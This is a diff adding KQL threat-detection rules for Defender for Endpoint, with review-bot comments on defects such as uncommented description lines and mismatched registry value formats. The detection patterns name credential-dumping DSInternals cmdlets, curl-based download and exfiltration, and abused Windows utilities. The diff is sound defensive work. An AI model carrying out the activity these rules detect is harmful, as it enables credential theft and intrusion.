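Review bot: In csexec_service_file_creation.kql the query `DeviceFileEvents | where FolderPath endswith "\\csexecsvc.exe"` matches every file event on that path, including modifications, renames and deletions, although the title and description only describe the creation of the service binary; one CSExec run can therefore fire several times and a later cleanup of the file alerts again. If the source rule is a file-creation rule, as the title suggests, narrow it to `| where ActionType == "FileCreated" and FolderPath endswith "\\csexecsvc.exe"`. The same DeviceFileEvents query without an ActionType filter appears in file_with_uncommon_extension_created_by_an_office_application.kql further down, where the title likewise says "Created".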
@@ -0,0 +1,10 @@
+// Title: Curl Web Request With Potential Custom User-Agent
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-07-27
+// Level: medium
+// Description: Detects execution of "curl.exe" with a potential custom "User-Agent". Attackers can leverage this to download or exfiltrate data via "curl" to a domain that only accept specific "User-Agent" strings
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "User-Agent:" and ProcessCommandLine matches regex "\\s-H\\s") and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/data_export_from_mssql_table_via_bcp_exe.kql b/KQL/rules/Execution/data_export_from_mssql_table_via_bcp_exe.kql
new file mode 100644
index 00000000..a46b9780
--- /dev/null
+++ b/KQL/rules/Execution/data_export_from_mssql_table_via_bcp_exe.kql
@@ -0,0 +1,14 @@
+// Title: Data Export From MSSQL Table Via BCP.EXE
+// Author: Omar Khaled (@beacon_exe), MahirAli Khan (in/mahiralikhan), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-08-20
+// Level: medium
+// Description: Detects the execution of the BCP utility in order to export data from the database.
+Attackers were seen saving their malware to a database column or table and then later extracting it via "bcp.exe" into a file.
+
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.exfiltration, attack.t1048
+// False Positives:
+// - Legitimate data export operations.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " out " or ProcessCommandLine contains " queryout ") and (FolderPath endswith "\\bcp.exe" or ProcessVersionInfoOriginalFileName =~ "BCP.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/detection_of_powershell_execution_via_sqlps_exe.kql b/KQL/rules/Execution/detection_of_powershell_execution_via_sqlps_exe.kql
new file mode 100644
index 00000000..49d4519c
--- /dev/null
+++ b/KQL/rules/Execution/detection_of_powershell_execution_via_sqlps_exe.kql
@@ -0,0 +1,14 @@
+// Title: Detection of PowerShell Execution via Sqlps.exe
+// Author: Agro (@agro_sev) oscd.community
+// Date: 2020-10-10
+// Level: medium
+// Description: This rule detects execution of a PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities supplied with the MSSQL Server.
+Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.
+
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1127
+// False Positives:
+// - Direct PS command execution through SQLPS.exe is uncommon, childprocess sqlps.exe spawned by sqlagent.exe is a legitimate action.
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\sqlps.exe" or ((FolderPath endswith "\\sqlps.exe" or ProcessVersionInfoOriginalFileName =~ "sqlps.exe") and (not(InitiatingProcessFolderPath endswith "\\sqlagent.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Execution/dotnet_assembly_dll_loaded_via_office_application.kql b/KQL/rules/Execution/dotnet_assembly_dll_loaded_via_office_application.kql
new file mode 100644
index 00000000..fd2e17ce
--- /dev/null
+++ b/KQL/rules/Execution/dotnet_assembly_dll_loaded_via_office_application.kql
@@ -0,0 +1,10 @@
+// Title: DotNET Assembly DLL Loaded Via Office Application
+// Author: Antonlovesdnb
+// Date: 2020-02-19
+// Level: medium
+// Description: Detects any assembly DLL being loaded by an Office Product
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204.002
+
+DeviceImageLoadEvents
+| where FolderPath startswith "C:\\Windows\\assembly\\" and (InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\mspub.exe" or InitiatingProcessFolderPath endswith "\\onenote.exe" or InitiatingProcessFolderPath endswith "\\onenoteim.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/dsinternals_suspicious_powershell_cmdlets.kql b/KQL/rules/Execution/dsinternals_suspicious_powershell_cmdlets.kql
new file mode 100644
index 00000000..ceede2b3
--- /dev/null
+++ b/KQL/rules/Execution/dsinternals_suspicious_powershell_cmdlets.kql
@@ -0,0 +1,14 @@
+// Title: DSInternals Suspicious PowerShell Cmdlets
+// Author: Nasreddine Bencherchali (Nextron Systems), Nounou Mbeiri
+// Date: 2024-06-26
+// Level: high
+// Description: Detects execution and usage of the DSInternals PowerShell module. Which can be used to perform what might be considered as suspicious activity such as dumping DPAPI backup keys or manipulating NTDS.DIT files.
+The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory. These include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.
+
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+// False Positives:
+// - Legitimate usage of DSInternals for administration or audit purpose.
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "Add-ADDBSidHistory" or ProcessCommandLine contains "Add-ADNgcKey" or ProcessCommandLine contains "Add-ADReplNgcKey" or ProcessCommandLine contains "ConvertFrom-ADManagedPasswordBlob" or ProcessCommandLine contains "ConvertFrom-GPPrefPassword" or ProcessCommandLine contains "ConvertFrom-ManagedPasswordBlob" or ProcessCommandLine contains "ConvertFrom-UnattendXmlPassword" or ProcessCommandLine contains "ConvertFrom-UnicodePassword" or ProcessCommandLine contains "ConvertTo-AADHash" or ProcessCommandLine contains "ConvertTo-GPPrefPassword" or ProcessCommandLine contains "ConvertTo-KerberosKey" or ProcessCommandLine contains "ConvertTo-LMHash" or ProcessCommandLine contains "ConvertTo-MsoPasswordHash" or ProcessCommandLine contains "ConvertTo-NTHash" or ProcessCommandLine contains "ConvertTo-OrgIdHash" or ProcessCommandLine contains "ConvertTo-UnicodePassword" or ProcessCommandLine contains "Disable-ADDBAccount" or ProcessCommandLine contains "Enable-ADDBAccount" or ProcessCommandLine contains "Get-ADDBAccount" or ProcessCommandLine contains "Get-ADDBBackupKey" or ProcessCommandLine contains "Get-ADDBDomainController" or ProcessCommandLine contains "Get-ADDBGroupManagedServiceAccount" or ProcessCommandLine contains "Get-ADDBKdsRootKey" or ProcessCommandLine contains "Get-ADDBSchemaAttribute" or ProcessCommandLine contains "Get-ADDBServiceAccount" or ProcessCommandLine contains "Get-ADDefaultPasswordPolicy" or ProcessCommandLine contains "Get-ADKeyCredential" or ProcessCommandLine contains "Get-ADPasswordPolicy" or ProcessCommandLine contains "Get-ADReplAccount" or ProcessCommandLine contains "Get-ADReplBackupKey" or ProcessCommandLine contains "Get-ADReplicationAccount" or ProcessCommandLine contains "Get-ADSIAccount" or ProcessCommandLine contains "Get-AzureADUserEx" or ProcessCommandLine contains "Get-BootKey" or ProcessCommandLine contains "Get-KeyCredential" or ProcessCommandLine contains "Get-LsaBackupKey" or ProcessCommandLine contains "Get-LsaPolicy" or ProcessCommandLine contains "Get-SamPasswordPolicy" or ProcessCommandLine contains "Get-SysKey" or ProcessCommandLine contains "Get-SystemKey" or ProcessCommandLine contains "New-ADDBRestoreFromMediaScript" or ProcessCommandLine contains "New-ADKeyCredential" or ProcessCommandLine contains "New-ADNgcKey" or ProcessCommandLine contains "New-NTHashSet" or ProcessCommandLine contains "Remove-ADDBObject" or ProcessCommandLine contains "Save-DPAPIBlob" or ProcessCommandLine contains "Set-ADAccountPasswordHash" or ProcessCommandLine contains "Set-ADDBAccountPassword" or ProcessCommandLine contains "Set-ADDBBootKey" or ProcessCommandLine contains "Set-ADDBDomainController" or ProcessCommandLine contains "Set-ADDBPrimaryGroup" or ProcessCommandLine contains "Set-ADDBSysKey" or ProcessCommandLine contains "Set-AzureADUserEx" or ProcessCommandLine contains "Set-LsaPolicy" or ProcessCommandLine contains "Set-SamAccountPasswordHash" or ProcessCommandLine contains "Set-WinUserPasswordHash" or ProcessCommandLine contains "Test-ADDBPasswordQuality" or ProcessCommandLine contains "Test-ADPasswordQuality" or ProcessCommandLine contains "Test-ADReplPasswordQuality" or ProcessCommandLine contains "Test-PasswordQuality" or ProcessCommandLine contains "Unlock-ADDBAccount" or ProcessCommandLine contains "Write-ADNgcKey" or ProcessCommandLine contains "Write-ADReplNgcKey"
\ No newline at end of file
diff --git a/KQL/rules/Execution/enable_bpf_kprobes_tracing.kql b/KQL/rules/Execution/enable_bpf_kprobes_tracing.kql
new file mode 100644
index 00000000..07c258fb
--- /dev/null
+++ b/KQL/rules/Execution/enable_bpf_kprobes_tracing.kql
@@ -0,0 +1,10 @@
+// Title: Enable BPF Kprobes Tracing
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-25
+// Level: medium
+// Description: Detects common command used to enable bpf kprobes tracing
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/myprobe/enable" or ProcessCommandLine contains "/myretprobe/enable") and (ProcessCommandLine contains "echo 1 >" and ProcessCommandLine contains "/sys/kernel/debug/tracing/events/kprobes/")
\ No newline at end of file
diff --git a/KQL/rules/Execution/enable_microsoft_dynamic_data_exchange.kql b/KQL/rules/Execution/enable_microsoft_dynamic_data_exchange.kql
new file mode 100644
index 00000000..97a80aa1
--- /dev/null
+++ b/KQL/rules/Execution/enable_microsoft_dynamic_data_exchange.kql
@@ -0,0 +1,10 @@
+// Title: Enable Microsoft Dynamic Data Exchange
+// Author: frack113
+// Date: 2022-02-26
+// Level: medium
+// Description: Enable Dynamic Data Exchange protocol (DDE) in all supported editions of Microsoft Word or Excel.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1559.002
+
+DeviceRegistryEvents
+| where (RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\Excel\\Security\\DisableDDEServerLaunch" or RegistryKey endswith "\\Excel\\Security\\DisableDDEServerLookup")) or ((RegistryValueData in~ ("DWORD (0x00000001)", "DWORD (0x00000002)")) and RegistryKey endswith "\\Word\\Security\\AllowDDE")
\ No newline at end of file
diff --git a/KQL/rules/Execution/esxi_vm_kill_via_esxcli.kql b/KQL/rules/Execution/esxi_vm_kill_via_esxcli.kql
new file mode 100644
index 00000000..f4bdd5fd
--- /dev/null
+++ b/KQL/rules/Execution/esxi_vm_kill_via_esxcli.kql
@@ -0,0 +1,12 @@
+// Title: ESXi VM Kill Via ESXCLI
+// Author: Nasreddine Bencherchali (Nextron Systems), Cedric Maurugeon
+// Date: 2023-09-04
+// Level: medium
+// Description: Detects execution of the "esxcli" command with the "vm" and "kill" flag in order to kill/shutdown a specific VM.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.impact, attack.t1059.012, attack.t1529
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "vm process" and ProcessCommandLine contains "kill") and FolderPath endswith "/esxcli"
\ No newline at end of file
diff --git a/KQL/rules/Execution/exchange_powershell_snap_ins_usage.kql b/KQL/rules/Execution/exchange_powershell_snap_ins_usage.kql
new file mode 100644
index 00000000..52739dd5
--- /dev/null
+++ b/KQL/rules/Execution/exchange_powershell_snap_ins_usage.kql
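Review bot: The DDE rule compares `RegistryValueData` with Sysmon-formatted strings (`"DWORD (0x00000000)"`, `"DWORD (0x00000001)"`, `"DWORD (0x00000002)"`), but as far as I know Defender for Endpoint's DeviceRegistryEvents reports a DWORD's value as plain decimal text (`"0"`, `"1"`, `"2"`) and carries the type in the separate `RegistryValueType` column; if that holds, none of these comparisons can ever match and the rule is silently dead. Please verify against live DeviceRegistryEvents data and, if confirmed, rewrite the comparisons as e.g. `RegistryValueData == "0"` and `RegistryValueData in ("1", "2")`, preferably in the converter so every registry rule produced by it is fixed in one place. The query itself looks right otherwise; `endswith` on `RegistryKey` is case-insensitive, so the `=~`/`in~` on the data side are the only parts that depend on the value format.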
@@ -0,0 +1,10 @@
+// Title: Exchange PowerShell Snap-Ins Usage
+// Author: FPT.EagleEye, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-03-03
+// Level: high
+// Description: Detects adding and using Exchange PowerShell snap-ins to export mailbox data. As seen used by HAFNIUM and APT27
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001, attack.collection, attack.t1114
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "Add-PSSnapin" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (ProcessCommandLine contains "Microsoft.Exchange.Powershell.Snapin" or ProcessCommandLine contains "Microsoft.Exchange.Management.PowerShell.SnapIn")) and (not((ProcessCommandLine contains "$exserver=Get-ExchangeServer ([Environment]::MachineName) -ErrorVariable exerr 2> $null" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\msiexec.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Execution/execute_code_with_pester_bat.kql b/KQL/rules/Execution/execute_code_with_pester_bat.kql
new file mode 100644
index 00000000..1269c58c
--- /dev/null
+++ b/KQL/rules/Execution/execute_code_with_pester_bat.kql
@@ -0,0 +1,12 @@
+// Title: Execute Code with Pester.bat
+// Author: Julia Fomina, oscd.community
+// Date: 2020-10-08
+// Level: medium
+// Description: Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1216
+// False Positives:
+// - Legitimate use of Pester for writing tests for Powershell scripts and modules
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "Pester" and ProcessCommandLine contains "Get-Help") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) or (((ProcessCommandLine contains "pester" and ProcessCommandLine contains ";") and FolderPath endswith "\\cmd.exe") and (ProcessCommandLine contains "help" or ProcessCommandLine contains "?"))
\ No newline at end of file
diff --git a/KQL/rules/Execution/execute_code_with_pester_bat_as_parent.kql b/KQL/rules/Execution/execute_code_with_pester_bat_as_parent.kql
new file mode 100644
index 00000000..34eb88ed
--- /dev/null
+++ b/KQL/rules/Execution/execute_code_with_pester_bat_as_parent.kql
@@ -0,0 +1,12 @@
+// Title: Execute Code with Pester.bat as Parent
+// Author: frack113, Nasreddine Bencherchali
+// Date: 2022-08-20
+// Level: medium
+// Description: Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1216
+// False Positives:
+// - Legitimate use of Pester for writing tests for Powershell scripts and modules
+
+DeviceProcessEvents
+| where (InitiatingProcessCommandLine contains "{ Invoke-Pester -EnableExit ;" or InitiatingProcessCommandLine contains "{ Get-Help \"") and (InitiatingProcessCommandLine contains "\\WindowsPowerShell\\Modules\\Pester\\" and (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Execution/execution_of_powershell_script_in_public_folder.kql b/KQL/rules/Execution/execution_of_powershell_script_in_public_folder.kql
new file mode 100644
index 00000000..4a6dfd1a
--- /dev/null
+++ b/KQL/rules/Execution/execution_of_powershell_script_in_public_folder.kql
@@ -0,0 +1,12 @@
+// Title: Execution of Powershell Script in Public Folder
+// Author: Max Altgelt (Nextron Systems)
+// Date: 2022-04-06
+// Level: high
+// Description: This rule detects execution of PowerShell scripts located in the "C:\Users\Public" folder
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-f C:\\Users\\Public" or ProcessCommandLine contains "-f \"C:\\Users\\Public" or ProcessCommandLine contains "-f %Public%" or ProcessCommandLine contains "-fi C:\\Users\\Public" or ProcessCommandLine contains "-fi \"C:\\Users\\Public" or ProcessCommandLine contains "-fi %Public%" or ProcessCommandLine contains "-fil C:\\Users\\Public" or ProcessCommandLine contains "-fil \"C:\\Users\\Public" or ProcessCommandLine contains "-fil %Public%" or ProcessCommandLine contains "-file C:\\Users\\Public" or ProcessCommandLine contains "-file \"C:\\Users\\Public" or ProcessCommandLine contains "-file %Public%") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/execution_of_script_located_in_potentially_suspicious_directory.kql b/KQL/rules/Execution/execution_of_script_located_in_potentially_suspicious_directory.kql
new file mode 100644
index 00000000..6134260b
--- /dev/null
+++ b/KQL/rules/Execution/execution_of_script_located_in_potentially_suspicious_directory.kql
@@ -0,0 +1,10 @@
+// Title: Execution Of Script Located In Potentially Suspicious Directory
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2023-06-02
+// Level: medium
+// Description: Detects executions of scripts located in potentially suspicious locations such as "/tmp" via a shell such as "bash", "sh", etc.
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " -c " and (FolderPath endswith "/bash" or FolderPath endswith "/csh" or FolderPath endswith "/dash" or FolderPath endswith "/fish" or FolderPath endswith "/ksh" or FolderPath endswith "/sh" or FolderPath endswith "/zsh") and ProcessCommandLine contains "/tmp/"
\ No newline at end of file
diff --git a/KQL/rules/Execution/file_decryption_using_gpg4win.kql b/KQL/rules/Execution/file_decryption_using_gpg4win.kql
new file mode 100644
index 00000000..e39ad38d
--- /dev/null
+++ b/KQL/rules/Execution/file_decryption_using_gpg4win.kql
@@ -0,0 +1,10 @@
+// Title: File Decryption Using Gpg4win
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-09
+// Level: medium
+// Description: Detects usage of Gpg4win to decrypt files
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -d " and ProcessCommandLine contains "passphrase") and ((FolderPath endswith "\\gpg.exe" or FolderPath endswith "\\gpg2.exe") or ProcessVersionInfoFileDescription =~ "GnuPG’s OpenPGP tool")
\ No newline at end of file
diff --git a/KQL/rules/Execution/file_download_from_ip_url_via_curl_exe.kql b/KQL/rules/Execution/file_download_from_ip_url_via_curl_exe.kql
new file mode 100644
index 00000000..b207198e
--- /dev/null
+++ b/KQL/rules/Execution/file_download_from_ip_url_via_curl_exe.kql
@@ -0,0 +1,10 @@
+// Title: File Download From IP URL Via Curl.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-10-18
+// Level: medium
+// Description: Detects file downloads directly from IP address URL using curl.exe
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " -O" or ProcessCommandLine contains "--remote-name" or ProcessCommandLine contains "--output") and ProcessCommandLine contains "http" and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe") and ProcessCommandLine matches regex "://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}") and (not((ProcessCommandLine endswith ".bat" or ProcessCommandLine endswith ".bat\"" or ProcessCommandLine endswith ".dat" or ProcessCommandLine endswith ".dat\"" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".dll\"" or ProcessCommandLine endswith ".exe" or ProcessCommandLine endswith ".exe\"" or ProcessCommandLine endswith ".gif" or ProcessCommandLine endswith ".gif\"" or ProcessCommandLine endswith ".hta" or ProcessCommandLine endswith ".hta\"" or ProcessCommandLine endswith ".jpeg" or ProcessCommandLine endswith ".jpeg\"" or ProcessCommandLine endswith ".log" or ProcessCommandLine endswith ".log\"" or ProcessCommandLine endswith ".msi" or ProcessCommandLine endswith ".msi\"" or ProcessCommandLine endswith ".png" or ProcessCommandLine endswith ".png\"" or ProcessCommandLine endswith ".ps1" or ProcessCommandLine endswith ".ps1\"" or ProcessCommandLine endswith ".psm1" or ProcessCommandLine endswith ".psm1\"" or ProcessCommandLine endswith ".vbe" or ProcessCommandLine endswith ".vbe\"" or ProcessCommandLine endswith ".vbs" or ProcessCommandLine endswith ".vbs\"" or ProcessCommandLine endswith ".bat'" or ProcessCommandLine endswith ".dat'" or ProcessCommandLine endswith ".dll'" or ProcessCommandLine endswith ".exe'" or ProcessCommandLine endswith ".gif'" or ProcessCommandLine endswith ".hta'" or ProcessCommandLine endswith ".jpeg'" or ProcessCommandLine endswith ".log'" or ProcessCommandLine endswith ".msi'" or ProcessCommandLine endswith ".png'" or ProcessCommandLine endswith ".ps1'" or ProcessCommandLine endswith ".psm1'" or ProcessCommandLine endswith ".vbe'" or ProcessCommandLine endswith ".vbs'")))
\ No newline at end of file
diff --git a/KQL/rules/Execution/file_encryption_decryption_via_gpg4win_from_suspicious_locations.kql b/KQL/rules/Execution/file_encryption_decryption_via_gpg4win_from_suspicious_locations.kql
new file mode 100644
index 00000000..13bb5065
--- /dev/null
+++ b/KQL/rules/Execution/file_encryption_decryption_via_gpg4win_from_suspicious_locations.kql
@@ -0,0 +1,10 @@
+// Title: File Encryption/Decryption Via Gpg4win From Suspicious Locations
+// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
+// Date: 2022-11-30
+// Level: high
+// Description: Detects usage of Gpg4win to encrypt/decrypt files located in potentially suspicious locations.
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "-passphrase" and ((FolderPath endswith "\\gpg.exe" or FolderPath endswith "\\gpg2.exe") or ProcessVersionInfoProductName =~ "GNU Privacy Guard (GnuPG)" or ProcessVersionInfoFileDescription =~ "GnuPG’s OpenPGP tool") and (ProcessCommandLine contains ":\\PerfLogs\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\AppData\\Roaming\\")
\ No newline at end of file
diff --git a/KQL/rules/Execution/file_encryption_using_gpg4win.kql b/KQL/rules/Execution/file_encryption_using_gpg4win.kql
new file mode 100644
index 00000000..0b41139c
--- /dev/null
+++ b/KQL/rules/Execution/file_encryption_using_gpg4win.kql
@@ -0,0 +1,10 @@
+// Title: File Encryption Using Gpg4win
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-09
+// Level: medium
+// Description: Detects usage of Gpg4win to encrypt files
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -c " and ProcessCommandLine contains "passphrase") and ((FolderPath endswith "\\gpg.exe" or FolderPath endswith "\\gpg2.exe") or ProcessVersionInfoFileDescription =~ "GnuPG’s OpenPGP tool")
\ No newline at end of file
diff --git a/KQL/rules/Execution/file_with_uncommon_extension_created_by_an_office_application.kql b/KQL/rules/Execution/file_with_uncommon_extension_created_by_an_office_application.kql
new file mode 100644
index 00000000..650b7be1
--- /dev/null
+++ b/KQL/rules/Execution/file_with_uncommon_extension_created_by_an_office_application.kql
@@ -0,0 +1,10 @@
+// Title: File With Uncommon Extension Created By An Office Application
+// Author: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-08-23
+// Level: high
+// Description: Detects the creation of files with an executable or script extension by an Office application.
+// MITRE Tactic: Execution
+// Tags: attack.t1204.002, attack.execution
+
+DeviceFileEvents
+| where ((InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\msaccess.exe" or InitiatingProcessFolderPath endswith "\\mspub.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\visio.exe" or InitiatingProcessFolderPath endswith "\\winword.exe") and (FolderPath endswith ".bat" or FolderPath endswith ".cmd" or FolderPath endswith ".com" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".hta" or FolderPath endswith ".ocx" or FolderPath endswith ".proj" or FolderPath endswith ".ps1" or FolderPath endswith ".scf" or FolderPath endswith ".scr" or FolderPath endswith ".sys" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs" or FolderPath endswith ".wsf" or FolderPath endswith ".wsh")) and (not((FolderPath contains "\\AppData\\Local\\assembly\\tmp\\" and FolderPath endswith ".dll"))) and (not((((FolderPath contains "C:\\Users\\" and FolderPath contains "\\AppData\\Local\\Microsoft\\Office\\" and FolderPath contains "\\BackstageInAppNavCache\\") and FolderPath endswith ".com") or (InitiatingProcessFolderPath endswith "\\winword.exe" and FolderPath contains "\\AppData\\Local\\Temp\\webexdelta\\" and (FolderPath endswith ".dll" or FolderPath endswith ".exe")) or ((FolderPath contains "C:\\Users\\" and FolderPath contains "\\AppData\\Local\\Microsoft\\Office\\" and FolderPath contains "\\WebServiceCache\\AllUsers") and FolderPath endswith ".com"))))
\ No newline at end of file
diff --git a/KQL/rules/Execution/filefix_command_evidence_in_typedpaths_from_browser_file_upload_abuse.kql b/KQL/rules/Execution/filefix_command_evidence_in_typedpaths_from_browser_file_upload_abuse.kql
new file mode 100644
index 00000000..2968f382
--- /dev/null
+++ b/KQL/rules/Execution/filefix_command_evidence_in_typedpaths_from_browser_file_upload_abuse.kql
@@ -0,0 +1,10 @@
+// Title: FileFix - Command Evidence in TypedPaths from Browser File Upload Abuse
+// Author: Alfie Champion (delivr.to)
+// Date: 2025-07-05
+// Level: high
+// Description: Detects commonly-used chained commands and strings in the most recent 'url' value of the 'TypedPaths' key, which could be indicative of a user being targeted by the FileFix technique.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204.004
+
+DeviceRegistryEvents
+| where (RegistryValueData contains "#" and (InitiatingProcessFolderPath endswith "\\brave.exe" or InitiatingProcessFolderPath endswith "\\chrome.exe" or InitiatingProcessFolderPath endswith "\\firefox.exe" or InitiatingProcessFolderPath endswith "\\msedge.exe") and RegistryKey endswith "\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\TypedPaths\\url1") and (RegistryValueData contains "cmd" or RegistryValueData contains "curl" or RegistryValueData contains "powershell" or RegistryValueData contains "bitsadmin" or RegistryValueData contains "certutil" or RegistryValueData contains "mshta" or RegistryValueData contains "regsvr32")
\ No newline at end of file
diff --git a/KQL/rules/Execution/filefix_suspicious_child_process_from_browser_file_upload_abuse.kql b/KQL/rules/Execution/filefix_suspicious_child_process_from_browser_file_upload_abuse.kql
new file mode 100644
index 00000000..3383bd6a
--- /dev/null
+++ b/KQL/rules/Execution/filefix_suspicious_child_process_from_browser_file_upload_abuse.kql
@@ -0,0 +1,15 @@
+// Title: FileFix - Suspicious Child Process from Browser File Upload Abuse
+// Author: 0xFustang
+// Date: 2025-06-26
+// Level: high
+// Description: Detects potentially suspicious subprocesses such as LOLBINs spawned by web browsers. This activity could be associated with the "FileFix" social engineering technique,
+where users are tricked into launching the file explorer via a browser-based phishing page and pasting malicious commands into the address bar.
+The technique abuses clipboard manipulation and disguises command execution as benign file path access, resulting in covert execution of system utilities.
+
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204.004
+// False Positives:
+// - Legitimate use of PowerShell or other utilities launched from browser extensions or automation tools
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "#" and (FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe") and (InitiatingProcessFolderPath endswith "\\brave.exe" or InitiatingProcessFolderPath endswith "\\chrome.exe" or InitiatingProcessFolderPath endswith "\\firefox.exe" or InitiatingProcessFolderPath endswith "\\msedge.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/forfiles_command_execution.kql b/KQL/rules/Execution/forfiles_command_execution.kql
new file mode 100644
index 00000000..7793cddc
--- /dev/null
+++ b/KQL/rules/Execution/forfiles_command_execution.kql
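Review bot: The multi-line description in this hunk only carries the `//` marker on its first line; the continuation lines `where users are tricked …` and `The technique abuses …` have no comment prefix, so a KQL engine will try to parse them as query text and the rule fails to run. Each continuation line needs the prefix, e.g. `// where users are tricked into launching the file explorer via a browser-based phishing page and pasting malicious commands into the address bar.`, or the description should be joined onto a single `// Description:` line. The same pattern appears in the Forfiles Command Execution and Fsutil Behavior Set SymlinkEvaluation hunks, the HackTool - SharpWSUS/WSUSpendu Execution hunk and the Installation of WSL Kali-Linux hunk. Since these files look like converter output, the fix belongs in the generator's rendering of multi-line descriptions rather than in each rule by hand.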
@@ -0,0 +1,15 @@
+// Title: Forfiles Command Execution
+// Author: Tim Rauch, Elastic, E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
+// Date: 2022-06-14
+// Level: medium
+// Description: Detects the execution of "forfiles" with the "/c" flag.
+While this is an expected behavior of the tool, it can be abused in order to proxy execution through it with any binary.
+Can be used to bypass application whitelisting.
+
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+// False Positives:
+// - Legitimate use via a batch script or by an administrator.
+
+DeviceProcessEvents
